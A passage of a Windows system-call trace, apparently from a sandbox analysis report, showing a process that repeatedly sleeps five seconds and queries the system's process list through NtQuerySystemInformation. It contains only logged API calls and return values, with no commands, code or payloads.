NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.919] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.927] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.936] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.943] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.952] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.963] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.971] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.997] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.006] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.014] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.023] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.032] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.041] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.061] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.073] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.082] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.091] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, 